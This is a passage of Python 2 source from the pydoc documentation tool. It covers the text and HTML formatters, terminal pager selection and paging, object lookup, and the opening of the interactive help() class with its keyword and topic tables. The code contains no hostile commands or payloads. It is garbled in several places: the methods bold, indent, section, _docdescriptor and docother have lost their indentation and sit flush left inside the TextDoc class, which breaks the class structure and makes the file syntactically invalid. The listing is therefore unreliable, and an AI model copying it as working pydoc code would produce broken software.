    def docproperty(self, object, name=None, mod=None, cl=None):
        """Produce html documentation for a property."""
        return self._docdescriptor(name, object, mod)
    def docother(self, object, name=None, mod=None, *ignored):
        """Produce HTML documentation for a data object."""
        lhs = name and '<strong>%s</strong> = ' % name or ''
        return lhs + self.repr(object)
    def docdata(self, object, name=None, mod=None, cl=None):
        """Produce html documentation for a data descriptor."""
        return self._docdescriptor(name, object, mod)
    def index(self, dir, shadowed=None):
        """Generate an HTML index for a directory of modules."""
        modpkgs = []
        if shadowed is None: shadowed = {}
        for importer, name, ispkg in pkgutil.iter_modules([dir]):
            modpkgs.append((name, '', ispkg, name in shadowed))
            shadowed[name] = 1
        modpkgs.sort()
        contents = self.multicolumn(modpkgs, self.modpkglink)
        return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
    """Class for safely making a text representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100
    def repr1(self, x, level):
        # Dispatch to a type-specific repr_* handler when one exists.
        if hasattr(type(x), '__name__'):
            handler = getattr(self, 'repr_' + join(split(type(x).__name__), '_'), None)
            if handler is not None:
                return handler(x, level)
        return cram(stripid(repr(x)), self.maxother)
    def repr_string(self, x, level):
        shortened = cram(x, self.maxstring)
        shortened_repr = repr(shortened)
        if '\\' in shortened and '\\' not in replace(shortened_repr, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            quote = shortened_repr[0]
            return 'r' + quote + shortened + quote
        return shortened_repr
    repr_str = repr_string
    def repr_instance(self, x, level):
        try:
            return cram(stripid(repr(x)), self.maxstring)
        except:
            # repr() itself may raise; fall back to a generic placeholder.
            return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
    """Formatter class for text documentation."""
    # ------------------------------------------- text formatting utilities
    # Shared TextRepr instance; repr is exposed as a plain callable helper.
    _repr_instance = TextRepr()
    repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
    def formattree(self, tree, modname, parent=None, prefix=''):
        """Render in text a class tree as returned by inspect.getclasstree()."""
        result = ''
        for entry in tree:
            if type(entry) is type(()):
                # (class, bases) tuple: print the class with its bases.
                c, bases = entry
                result = result + prefix + classname(c, modname)
                if bases and bases != (parent,):
                    parents = map(lambda c, m=modname: classname(c, m), bases)
                    result = result + '(%s)' % join(parents, ', ')
                result = result + '\n'
            elif type(entry) is type([]):
                # A list entry holds the subclasses of 'c' from the
                # preceding tuple entry; recurse with a deeper indent.
                result = result + self.formattree(
                    entry, modname, c, prefix + '    ')
        return result
    def docmodule(self, object, name=None, mod=None):
        """Produce text documentation for a given module object."""
        name = object.__name__ # ignore the passed-in name
        synop, desc = splitdoc(getdoc(object))
        result = self.section('NAME', name + (synop and ' - ' + synop))
        try:
            all = object.__all__
        except AttributeError:
            all = None
        try:
            file = inspect.getabsfile(object)
        except TypeError:
            file = '(built-in)'
        result = result + self.section('FILE', file)
        docloc = self.getdocloc(object)
        if docloc is not None:
            result = result + self.section('MODULE DOCS', docloc)
        if desc:
            result = result + self.section('DESCRIPTION', desc)
        classes = []
        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None
                or (inspect.getmodule(value) or object) is object):
                if visiblename(key, all):
                    classes.append((key, value))
        funcs = []
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                inspect.isbuiltin(value) or inspect.getmodule(value) is object):
                if visiblename(key, all):
                    funcs.append((key, value))
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all):
                data.append((key, value))
        modpkgs = []
        modpkgs_names = set()
        if hasattr(object, '__path__'):
            # Packages: list the modules found on the package's __path__.
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs_names.add(modname)
                if ispkg:
                    modpkgs.append(modname + ' (package)')
                else:
                    modpkgs.append(modname)
            modpkgs.sort()
            result = result + self.section(
                'PACKAGE CONTENTS', join(modpkgs, '\n'))
        # Detect submodules as sometimes created by C extensions
        submodules = []
        for key, value in inspect.getmembers(object, inspect.ismodule):
            if value.__name__.startswith(name + '.') and key not in modpkgs_names:
                submodules.append(key)
        if submodules:
            submodules.sort()
            result = result + self.section(
                'SUBMODULES', join(submodules, '\n'))
        if classes:
            classlist = map(lambda key_value: key_value[1], classes)
            contents = [self.formattree(
                inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name))
            result = result + self.section('CLASSES', join(contents, '\n'))
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name))
            result = result + self.section('FUNCTIONS', join(contents, '\n'))
        if data:
            contents = []
            for key, value in data:
                contents.append(self.docother(value, key, name, maxlen=70))
            result = result + self.section('DATA', join(contents, '\n'))
        if hasattr(object, '__version__'):
            version = str(object.__version__)
            # Strip CVS "$Revision: ... $" decoration if present.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = strip(version[11:-1])
            result = result + self.section('VERSION', version)
        if hasattr(object, '__date__'):
            result = result + self.section('DATE', str(object.__date__))
        if hasattr(object, '__author__'):
            result = result + self.section('AUTHOR', str(object.__author__))
        if hasattr(object, '__credits__'):
            result = result + self.section('CREDITS', str(object.__credits__))
        return result
    def docclass(self, object, name=None, mod=None):
        """Produce text documentation for a given class object."""
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        def makename(c, m=object.__module__):
            return classname(c, m)
        if name == realname:
            title = 'class ' + self.bold(realname)
        else:
            title = self.bold(name) + ' = class ' + realname
        if bases:
            parents = map(makename, bases)
            title = title + '(%s)' % join(parents, ', ')
        doc = getdoc(object)
        contents = doc and [doc + '\n'] or []
        push = contents.append
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            push("Method resolution order:")
            for base in mro:
                push('    ' + makename(base))
            push('')
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('-' * 70)
                self.needone = 1
        hr = HorizontalRule()
        # The spill* helpers emit the attributes matching 'predicate' under
        # the heading 'msg' and hand back the attributes that didn't match.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self.document(getattr(object, name),
                                       name, mod, object))
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    if (hasattr(value, '__call__') or
                            inspect.isdatadescriptor(value)):
                        doc = getdoc(value)
                    else:
                        doc = None
                    push(self.docother(getattr(object, name),
                                       name, mod, maxlen=70, doc=doc) + '\n')
            return attrs
        attrs = filter(lambda data: visiblename(data[0]),
                       classify_class_attrs(object))
        # Walk the mro, emitting each class's attributes in kind order.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is __builtin__.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = "defined here"
            else:
                tag = "inherited from %s" % classname(thisclass,
                                                      object.__module__)
            # Sort attrs by name.
            attrs.sort()
            # Pump out the attrs, segregated by kind.
            attrs = spill("Methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill("Class methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill("Static methods %s:\n" % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = '\n'.join(contents)
        if not contents:
            return title + '\n'
        return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
    def formatvalue(self, object):
        """Format an argument default value as text."""
        # Rendered as "=default" inside the argument list.
        return '=' + self.repr(object)
    def docroutine(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a function or method object.

        name: the name the routine is bound under (defaults to __name__);
        mod:  the module it is documented in (for qualifying class names);
        cl:   the class currently being documented, if any.
        """
        realname = object.__name__
        name = name or realname
        note = ''
        skipdocs = 0
        if inspect.ismethod(object):
            # Python 2 bound/unbound method: record where it comes from,
            # then document the underlying function object instead.
            imclass = object.im_class
            if cl:
                if imclass is not cl:
                    note = ' from ' + classname(imclass, mod)
            else:
                if object.im_self is not None:
                    note = ' method of %s instance' % classname(
                        object.im_self.__class__, mod)
                else:
                    note = ' unbound %s method' % classname(imclass,mod)
            object = object.im_func
        if name == realname:
            title = self.bold(realname)
        else:
            # Bound under an alias.  If the class dict holds the very same
            # object under its real name, skip the docstring here (it is
            # shown once under the real name).
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                skipdocs = 1
            title = self.bold(name) + ' = ' + realname
        if inspect.isfunction(object):
            args, varargs, varkw, defaults = inspect.getargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, formatvalue=self.formatvalue)
            if realname == '<lambda>':
                title = self.bold(name) + ' lambda '
                argspec = argspec[1:-1] # remove parentheses
        else:
            # Built-ins and other non-function routines: signature unknown.
            argspec = '(...)'
        decl = title + argspec + note
        if skipdocs:
            return decl + '\n'
        else:
            doc = getdoc(object) or ''
            return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
    def docproperty(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a property.

        Delegates to _docdescriptor; 'cl' is accepted only for interface
        symmetry with the other doc* methods and is ignored.
        """
        return self._docdescriptor(name, object, mod)
    def docdata(self, object, name=None, mod=None, cl=None):
        """Produce text documentation for a data descriptor.

        Delegates to _docdescriptor; 'cl' is accepted only for interface
        symmetry with the other doc* methods and is ignored.
        """
        return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
    """The first time this is called, determine what kind of pager to use."""
    # Self-replacing stub: choose a concrete pager once, rebind the
    # module-level name 'pager' to it, then delegate this first call.
    # Subsequent calls go straight to the chosen implementation.
    global pager
    pager = getpager()
    pager(text)
def getpager():
    """Decide what method to use for paging through text.

    Returns a callable taking the text to display.  Preference order:
    honour $PAGER, then 'less', then 'more', then a built-in tty pager,
    falling back to plain printing whenever stdin/stdout is not a tty.
    """
    # Python 2: a redirected/replaced stdout is not a real file object.
    if type(sys.stdout) is not types.FileType:
        return plainpager
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        return plainpager
    if 'PAGER' in os.environ:
        if sys.platform == 'win32': # pipes completely broken in Windows
            return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
        elif os.environ.get('TERM') in ('dumb', 'emacs'):
            # Dumb terminals cannot render backspace-overstrike bold.
            return lambda text: pipepager(plain(text), os.environ['PAGER'])
        else:
            return lambda text: pipepager(text, os.environ['PAGER'])
    if os.environ.get('TERM') in ('dumb', 'emacs'):
        return plainpager
    if sys.platform == 'win32' or sys.platform.startswith('os2'):
        return lambda text: tempfilepager(plain(text), 'more <')
    # Probe for 'less' by running it with no input; exit status 0 means found.
    if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
        return lambda text: pipepager(text, 'less')
    # Last resort before the built-in pager: probe whether 'more' exists
    # by running it on an empty temporary file.
    import tempfile
    (fd, filename) = tempfile.mkstemp()
    os.close(fd)
    try:
        if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
            return lambda text: pipepager(text, 'more')
        else:
            return ttypager
    finally:
        os.unlink(filename)
def plain(text):
    """Strip pager-style boldface: drop every character that is immediately
    followed by a backspace, together with the backspace itself."""
    return re.sub(r'.\x08', '', text)
def pipepager(text, cmd):
    """Page through text by feeding it to another program."""
    # os.popen in 'w' mode hands us the child's stdin as a file object.
    pipe = os.popen(cmd, 'w')
    try:
        pipe.write(text)
        pipe.close()
    except IOError:
        pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file.

    The file is created securely with mkstemp (the original used the
    race-prone, deprecated tempfile.mktemp) and is always removed, even
    if writing the text fails.
    """
    import tempfile
    fd, filename = tempfile.mkstemp()
    try:
        file = os.fdopen(fd, 'w')
        file.write(text)
        file.close()
        os.system(cmd + ' "' + filename + '"')
    finally:
        os.unlink(filename)
def ttypager(text):
    """Page through text on a text terminal.

    Shows a screenful at a time; at the '-- more --' prompt: q quits,
    Enter advances one line, b/Esc goes back a page, anything else
    advances a page.
    """
    lines = split(plain(text), '\n')
    try:
        import tty
        fd = sys.stdin.fileno()
        old = tty.tcgetattr(fd)
        tty.setcbreak(fd)
        getchar = lambda: sys.stdin.read(1)
    except (ImportError, AttributeError):
        # No tty/termios support: fall back to line-buffered input and
        # use the first character of each entered line as the keystroke.
        tty = None
        getchar = lambda: sys.stdin.readline()[:-1][:1]
    try:
        # Bug fix: environment values are strings, so the original
        # "os.environ.get('LINES', 25) - 1" raised TypeError whenever the
        # LINES variable was actually set.  Convert explicitly.
        r = inc = int(os.environ.get('LINES', 25)) - 1
        sys.stdout.write(join(lines[:inc], '\n') + '\n')
        while lines[r:]:
            sys.stdout.write('-- more --')
            sys.stdout.flush()
            c = getchar()
            if c in ('q', 'Q'):
                sys.stdout.write('\r \r')
                break
            elif c in ('\r', '\n'):
                sys.stdout.write('\r \r' + lines[r] + '\n')
                r = r + 1
                continue
            if c in ('b', 'B', '\x1b'):
                r = r - inc - inc
                if r < 0: r = 0
            sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
            r = r + inc
    finally:
        # Restore the terminal mode we changed with setcbreak.
        if tty:
            tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
    """Simply print unformatted text. This is the ultimate fallback."""
    # plain() strips backspace-overstrike bold so raw streams stay clean.
    sys.stdout.write(plain(text))
def describe(thing):
    """Produce a short description of the given thing."""
    if inspect.ismodule(thing):
        modname = thing.__name__
        if modname in sys.builtin_module_names:
            return 'built-in module ' + modname
        if hasattr(thing, '__path__'):
            return 'package ' + modname
        return 'module ' + modname
    if inspect.isbuiltin(thing):
        return 'built-in function ' + thing.__name__
    # Both descriptor kinds are reported with their owning class's
    # fully-qualified name.
    for test, label in ((inspect.isgetsetdescriptor, 'getset descriptor'),
                        (inspect.ismemberdescriptor, 'member descriptor')):
        if test(thing):
            owner = thing.__objclass__
            return '%s %s.%s.%s' % (label, owner.__module__,
                                    owner.__name__, thing.__name__)
    for test, label in ((inspect.isclass, 'class'),
                        (inspect.isfunction, 'function'),
                        (inspect.ismethod, 'method')):
        if test(thing):
            return label + ' ' + thing.__name__
    # Python 2 old-style class instances are called out explicitly.
    if type(thing) is types.InstanceType:
        return 'instance of ' + thing.__class__.__name__
    return type(thing).__name__
def locate(path, forceload=0):
    """Locate an object by name or dotted path, importing as necessary."""
    parts = [part for part in split(path, '.') if part]
    # Import the longest importable prefix of the dotted path...
    module, n = None, 0
    while n < len(parts):
        nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
        if nextmodule: module, n = nextmodule, n + 1
        else: break
    if module:
        # ...then resolve the remaining parts as attribute accesses.
        object = module
        for part in parts[n:]:
            try: object = getattr(object, part)
            except AttributeError: return None
        return object
    else:
        # Nothing importable: last resort is the builtin namespace.
        # Falls off the end (returns None) when the name is unknown.
        if hasattr(__builtin__, path):
            return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
# Shared singleton formatters used by the top-level helper functions below.
text = TextDoc()
html = HTMLDoc()
# Sentinel: render_doc() compares against this type to detect instances of
# Python 2 old-style classes.
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
    """Given an object or a path to an object, get the object and its name."""
    if isinstance(thing, str):
        # A dotted-path string: look the object up (may import modules).
        object = locate(thing, forceload)
        if not object:
            raise ImportError, 'no Python documentation found for %r' % thing
        return object, thing
    else:
        # Already an object: pair it with its __name__, if it has one.
        return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
    """Render text documentation, given an object or a path to an object."""
    object, name = resolve(thing, forceload)
    desc = describe(object)
    module = inspect.getmodule(object)
    # Qualify the description with its dotted-path prefix or module.
    if name and '.' in name:
        desc += ' in ' + name[:name.rfind('.')]
    elif module and module is not object:
        desc += ' in module ' + module.__name__
    if type(object) is _OLD_INSTANCE_TYPE:
        # If the passed object is an instance of an old-style class,
        # document its available methods instead of its value.
        object = object.__class__
    elif not (inspect.ismodule(object) or
              inspect.isclass(object) or
              inspect.isroutine(object) or
              inspect.isgetsetdescriptor(object) or
              inspect.ismemberdescriptor(object) or
              isinstance(object, property)):
        # If the passed object is a piece of data or an instance,
        # document its available methods instead of its value.
        object = type(object)
        desc += ' object'
    # 'text' is the module-level TextDoc singleton.
    return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
    """Display text documentation, given an object or a path to an object."""
    try:
        pager(render_doc(thing, title, forceload))
    except (ImportError, ErrorDuringImport), value:
        # Lookup/import failures are reported, not raised, at this top level.
        print value
def writedoc(thing, forceload=0):
    """Write HTML documentation to a file in the current directory."""
    try:
        object, name = resolve(thing, forceload)
        page = html.page(describe(object), html.document(object, name))
        # NOTE(review): if write() raises, the file object is only closed by
        # GC; a try/finally would be tidier for this CLI tool.
        file = open(name + '.html', 'w')
        file.write(page)
        file.close()
        print 'wrote', name + '.html'
    except (ImportError, ErrorDuringImport), value:
        print value
def writedocs(dir, pkgpath='', done=None):
    """Write out HTML documentation for all modules in a directory tree."""
    # NOTE(review): 'done' is initialized here but never consulted in this
    # implementation; it appears to be kept for interface compatibility.
    if done is None: done = {}
    for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
        writedoc(modname)
    return
class Helper:
    """Interactive help session (the object behind the interpreter's help()).

    Calling the instance with no argument starts a "help>" read/eval loop
    on self.input/self.output; calling it with a request documents that
    keyword, symbol, topic, module, or dotted object path.
    """

    # These dictionaries map a topic name to either an alias, or a tuple
    # (label, seealso-items). The "label" is the label of the corresponding
    # section in the .rst file under Doc/ and an index into the dictionary
    # in pydoc_topics.py.
    #
    # CAUTION: if you change one of these dictionaries, be sure to adapt the
    # list of needed labels in Doc/tools/sphinxext/pyspecific.py and
    # regenerate the pydoc_topics.py file by running
    # make pydoc-topics
    # in Doc/ and copying the output file into the Lib/ directory.
    keywords = {
        'and': 'BOOLEAN',
        'as': 'with',
        'assert': ('assert', ''),
        'break': ('break', 'while for'),
        'class': ('class', 'CLASSES SPECIALMETHODS'),
        'continue': ('continue', 'while for'),
        'def': ('function', ''),
        'del': ('del', 'BASICMETHODS'),
        'elif': 'if',
        'else': ('else', 'while for'),
        'except': 'try',
        'exec': ('exec', ''),
        'finally': 'try',
        'for': ('for', 'break continue while'),
        'from': 'import',
        'global': ('global', 'NAMESPACES'),
        'if': ('if', 'TRUTHVALUE'),
        'import': ('import', 'MODULES'),
        'in': ('in', 'SEQUENCEMETHODS2'),
        'is': 'COMPARISON',
        'lambda': ('lambda', 'FUNCTIONS'),
        'not': 'BOOLEAN',
        'or': 'BOOLEAN',
        'pass': ('pass', ''),
        'print': ('print', ''),
        'raise': ('raise', 'EXCEPTIONS'),
        'return': ('return', 'FUNCTIONS'),
        'try': ('try', 'EXCEPTIONS'),
        'while': ('while', 'break continue if TRUTHVALUE'),
        'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
        'yield': ('yield', ''),
    }
    # Either add symbols to this dictionary or to the symbols dictionary
    # directly: Whichever is easier. They are merged later.
    _symbols_inverse = {
        'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
        'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
                       '|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
        'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
        'UNARY' : ('-', '~'),
        'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
                                 '^=', '<<=', '>>=', '**=', '//='),
        'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
        'COMPLEX' : ('j', 'J')
    }
    symbols = {
        '%': 'OPERATORS FORMATTING',
        '**': 'POWER',
        ',': 'TUPLES LISTS FUNCTIONS',
        '.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
        '...': 'ELLIPSIS',
        ':': 'SLICINGS DICTIONARYLITERALS',
        '@': 'def class',
        '\\': 'STRINGS',
        '_': 'PRIVATENAMES',
        '__': 'PRIVATENAMES SPECIALMETHODS',
        '`': 'BACKQUOTES',
        '(': 'TUPLES FUNCTIONS CALLS',
        ')': 'TUPLES FUNCTIONS CALLS',
        '[': 'LISTS SUBSCRIPTS SLICINGS',
        ']': 'LISTS SUBSCRIPTS SLICINGS'
    }
    # Merge _symbols_inverse into symbols: each symbol accumulates a
    # space-separated list of topic names.  (Class-body code: runs once,
    # at class-creation time.)
    for topic, symbols_ in _symbols_inverse.iteritems():
        for symbol in symbols_:
            topics = symbols.get(symbol, topic)
            if topic not in topics:
                topics = topics + ' ' + topic
            symbols[symbol] = topics
    topics = {
        'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
                  'FUNCTIONS CLASSES MODULES FILES inspect'),
        'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
                    'TYPES'),
        'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
        'FORMATTING': ('formatstrings', 'OPERATORS'),
        'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
                    'FORMATTING TYPES'),
        'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
        'INTEGER': ('integers', 'int range'),
        'FLOAT': ('floating', 'float math'),
        'COMPLEX': ('imaginary', 'complex cmath'),
        'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
        'MAPPINGS': 'DICTIONARIES',
        'FUNCTIONS': ('typesfunctions', 'def TYPES'),
        'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
        'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
        'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
        'FRAMEOBJECTS': 'TYPES',
        'TRACEBACKS': 'TYPES',
        'NONE': ('bltin-null-object', ''),
        'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
        'FILES': ('bltin-file-objects', ''),
        'SPECIALATTRIBUTES': ('specialattrs', ''),
        'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
        'MODULES': ('typesmodules', 'import'),
        'PACKAGES': 'import',
        'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
                        'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
                        'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
                        'LISTS DICTIONARIES BACKQUOTES'),
        'OPERATORS': 'EXPRESSIONS',
        'PRECEDENCE': 'EXPRESSIONS',
        'OBJECTS': ('objects', 'TYPES'),
        'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
                           'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
                           'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
        'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
        'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
        'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
        'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
                             'SPECIALMETHODS'),
        'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
                             'SPECIALMETHODS'),
        'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
        'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
                          'SPECIALMETHODS'),
        'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
        'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
        'DYNAMICFEATURES': ('dynamic-features', ''),
        'SCOPING': 'NAMESPACES',
        'FRAMES': 'NAMESPACES',
        'EXCEPTIONS': ('exceptions', 'try except finally raise'),
        'COERCIONS': ('coercion-rules','CONVERSIONS'),
        'CONVERSIONS': ('conversions', 'COERCIONS'),
        'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
        'SPECIALIDENTIFIERS': ('id-classes', ''),
        'PRIVATENAMES': ('atom-identifiers', ''),
        'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
                     'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
        'TUPLES': 'SEQUENCES',
        'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
        'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
        'LISTLITERALS': ('lists', 'LISTS LITERALS'),
        'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
        'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
        'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
        'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
                       'ATTRIBUTEMETHODS'),
        'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
        'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
        'CALLS': ('calls', 'EXPRESSIONS'),
        'POWER': ('power', 'EXPRESSIONS'),
        'UNARY': ('unary', 'EXPRESSIONS'),
        'BINARY': ('binary', 'EXPRESSIONS'),
        'SHIFTING': ('shifting', 'EXPRESSIONS'),
        'BITWISE': ('bitwise', 'EXPRESSIONS'),
        'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
        'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
        'ASSERTION': 'assert',
        'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
        'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
        'DELETION': 'del',
        'PRINTING': 'print',
        'RETURNING': 'return',
        'IMPORTING': 'import',
        'CONDITIONAL': 'if',
        'LOOPING': ('compound', 'for while break continue'),
        'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
        'DEBUGGING': ('debugger', 'pdb'),
        'CONTEXTMANAGERS': ('context-managers', 'with'),
    }

    def __init__(self, input, output):
        # input/output are file-like objects; usually sys.stdin/sys.stdout.
        self.input = input
        self.output = output

    def __repr__(self):
        # Typing "help" (without parens) at the interactive prompt repr()s
        # this object; detect that via the caller's code name ('?') and
        # start an interactive session instead of printing a repr.
        if inspect.stack()[1][3] == '?':
            self()
            return ''
        return '<pydoc.Helper instance>'

    def __call__(self, request=None):
        if request is not None:
            self.help(request)
        else:
            self.intro()
            self.interact()
            self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')

    def interact(self):
        """Run the help> prompt loop until quit/EOF/empty line."""
        self.output.write('\n')
        while True:
            try:
                request = self.getline('help> ')
                if not request: break
            except (KeyboardInterrupt, EOFError):
                break
            # Strip quotes so help> 'spam' and help> "spam" both work.
            request = strip(replace(request, '"', '', "'", ''))
            if lower(request) in ('q', 'quit'): break
            self.help(request)

    def getline(self, prompt):
        """Read one line, using raw_input when available."""
        if self.input is sys.stdin:
            # raw_input echoes the prompt and gets readline editing for free.
            return raw_input(prompt)
        else:
            self.output.write(prompt)
            self.output.flush()
            return self.input.readline()

    def help(self, request):
        # Dispatch: strings are checked against the special commands and the
        # symbol/keyword/topic tables before being treated as object paths.
        if type(request) is type(''):
            request = request.strip()
            if request == 'help': self.intro()
            elif request == 'keywords': self.listkeywords()
            elif request == 'symbols': self.listsymbols()
            elif request == 'topics': self.listtopics()
            elif request == 'modules': self.listmodules()
            elif request[:8] == 'modules ':
                self.listmodules(split(request)[1])
            elif request in self.symbols: self.showsymbol(request)
